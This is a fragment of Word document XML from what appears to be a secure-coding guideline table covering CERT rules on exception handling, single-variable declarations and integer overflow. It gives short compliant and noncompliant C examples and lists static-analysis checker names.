                <w:between w:space="0" w:sz="0" w:val="nil"/>
              </w:pBdr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Exceptions should be utilized as a possible layer of defense for potential security vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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7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7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7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82">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8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4">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85">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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8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8C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId40">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="0052cc"/>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28D">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28E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">main-function-catch-all</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">early-catch-all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000290">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91">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId41">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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LANG.STRUCT.UCTCH</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Unreachable Catch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000295">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId42">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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97">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">527 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000298">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99">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId43">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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9A">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29B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CERT_CPP-ERR51-a</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CERT_CPP-ERR51-b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Always catch exceptions</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Each exception explicitly thrown in the code shall have a handler of a compatible type in all call paths that could lead to that point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029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A1">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4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId44">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:b w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Do not declare more than one variable per declaration</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5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Variable Declaration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[DCL04-C]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Every declaration should be for a single variable, on its own line, with an explanatory comment about the role of the variable. Declaring multiple variables in a single declaration can cause confusion regarding the types of the variables and their initial values. If more than one variable is declared in a declaration, care must be taken that the type and initialized value of the variable are handled correctly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A8">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A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In this noncompliant code example, a programmer or code reviewer might mistakenly believe that the two variables src and c are declared as char *. In fact, src has a type of char *, whereas c has a type of char.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*src = 0, c = 0;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AC">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E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In this compliant solution, each variable is declared on a separate line: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(Although this change has no effect on compilation, the programmer's intent is clearer.)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*src;    /* Source string */</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c;       /* Character being tested */</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B6">
            <w:pPr>
              <w:pBdr>
                <w:top w:space="0" w:sz="0" w:val="nil"/>
                <w:left w:space="0" w:sz="0" w:val="nil"/>
                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
                <w:right w:space="0" w:sz="0" w:val="nil"/>
                <w:between w:space="0" w:sz="0" w:val="nil"/>
              </w:pBdr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Declaring multiple variables per line adds needless complexity to code, opening it up to potential vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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F">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1">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L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId45">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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2CB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">LANG.STRUCT.DECL.ML</w:t>
              <w:tab/>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Multiple Declarations on Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId46">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">ECLAIR</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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CF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CC2.DCL04</w:t>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D1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId47">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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579 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D4">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D5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId48">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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D6">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2D7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CERT_C-DCL04-a</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Each variable should be declared in a separate declaration statement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DB">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DC">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F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId49">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:b w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Verify that all integer values are in range</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E0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Integer Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[INT08-C]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Integer operations must result in an integer value within the range of the integer type (that is, the resulting value is the same as the result produced by unlimited-range integers). Frequently, the range is more restrictive depending on the use of the integer value, for example, as an index. Integer values can be verified by code review or by static analysis.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Integer overflow is undefined behavior, so a compiled program can do anything, including go off to play the Game of Life. Furthermore, a compiler may perform optimizations that assume an overflow will never occur, which can easily yield unexpected results. Compilers can optimize away if statements that check whether an overflow occurred. See MSC15-C. Do not depend on undefined behavior for an example.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Verifiably in-range operations are often preferable to treating out-of-range values as an error condition because the handling of these errors has been repeatedly shown to cause denial-of-service problems in actual applications. The quintessential example is the failure of the Ariane 5 launcher, which occurred because of an improperly handled conversion error that resulted in the processor being shut down [Lions 1996].</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 program that detects an integer overflow to be imminent may do one of two things: (1) signal some sort of error condition or (2) produce an integer result that is within the range of representable integers on that system. Some situations can be handled by an error condition, where an overflow causes a change in control flow (such as the system complaining about bad input and requesting alternative input from the user). Others are better handled by the latter option because it allows the computation to proceed and generate an integer result, thereby avoiding a denial-of-service attack. However, when continuing to produce an integer result in the face of overflow, the question of what integer result to return to the user must be considered.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The saturation and modwrap algorithms and the technique of restricted range usage, defined in the following subsections, produce integer results that are always within a defined range. This range is between the integer values </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MIN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MAX</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> (inclusive), where </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MIN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MAX</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> are two representable integers with </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MIN &lt; MAX</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002EB">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D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In this noncompliant example, i + 1 will overflow on a 16-bit machine. The C Standard allows signed integers to overflow and produce incorrect results. Compilers can take advantage of this to produce faster code by assuming an overflow will not occur. As a result, the if statement that is intended to catch an overflow might be optimized away.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i = /* Expression that evaluates to the value 32767 */;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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(i + 1 &lt;= i) {</w:t>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overflow */</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Expression involving i + 1 */</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F4">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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Using a long instead of an int is guaranteed to accommodate the computed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long i = /* Expression that evaluates to the value 32767 */;</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test is necessary; i is known not to overflow */</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Expression involving i + 1 */</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FE">
            <w:pPr>
              <w:pBdr>
                <w:top w:space="0" w:sz="0" w:val="nil"/>
                <w:left w:space="0" w:sz="0" w:val="nil"/>
                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
                <w:right w:space="0" w:sz="0" w:val="nil"/>
                <w:between w:space="0" w:sz="0" w:val="nil"/>
              </w:pBdr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Automated tests can be performed to make sure that all integer values fall within the acceptable range, or to ensure that there is no vulnerabilities if this is not the case.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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0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0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0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9">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0A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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11">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId50">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="0052cc"/>
                  <w:highlight w:val="white"/>
                  <w:u w:val="singl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312">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313">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">integer-overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000314">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315">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId51">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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316">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317">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ALLOC.SIZE.ADDOFLOW</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000318">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ALLOC.SIZE.IOFLOW</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000319">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ALLOC.SIZE.MULOFLOW</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ALLOC.SIZE.SUBUFLOW</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MISC.MEM.SIZE.ADDOFLOW</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MISC.MEM.SIZE.BAD</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MISC.MEM.SIZE.MULOFLOW</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MISC.MEM.SIZE.SUBUFLOW</w:t>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Addition Overflow of Allocation Size</w:t>
            </w:r>
          </w:p>
